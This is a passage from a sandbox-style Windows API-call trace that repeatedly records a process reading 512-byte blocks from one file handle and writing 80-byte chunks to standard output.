lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.554] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.554] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.555] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.555] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: 
lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.555] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.555] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.556] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.556] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] GetFileType (hFile=0x4c) returned 0x1 [0129.556] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.556] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] GetFileType (hFile=0x4c) 
returned 0x1 [0129.557] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.557] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.557] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.558] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.558] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, 
lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] GetFileType (hFile=0x4c) returned 0x1 [0129.558] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.558] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.559] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.559] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.559] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.559] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: 
hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.560] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.560] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.560] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.560] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.560] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0129.560] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.561] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.561] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.561] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.561] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, 
lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2ceda8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ceda8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cedf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cedf8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] GetFileType (hFile=0x4c) returned 0x1 [0129.562] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.562] WriteFile (in: hFile=0x4c, lpBuffer=0x2cee48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cee48*, lpNumberOfBytesWritten=0x2cde4c*=0x20, lpOverlapped=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.562] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cde38 | out: lpNewFilePointer=0x0) returned 1 [0129.562] _get_osfhandle (_FileHandle=4) returned 0x54 [0129.562] ReadFile (in: hFile=0x54, lpBuffer=0x2cec68, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2cde58, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesRead=0x2cde58*=0x200, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2cec68*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cec68*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2cecb8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2cecb8*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced08*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced08*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] WriteFile (in: hFile=0x4c, lpBuffer=0x2ced58*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2cde4c, lpOverlapped=0x0 | out: lpBuffer=0x2ced58*, lpNumberOfBytesWritten=0x2cde4c*=0x50, lpOverlapped=0x0) returned 1 [0129.563] _get_osfhandle (_FileHandle=1) returned 0x4c [0129.563] GetFileType (hFile=0x4c) returned 0x1 [0129.563] _get_osfhandle (_FileHandle=1) returned 
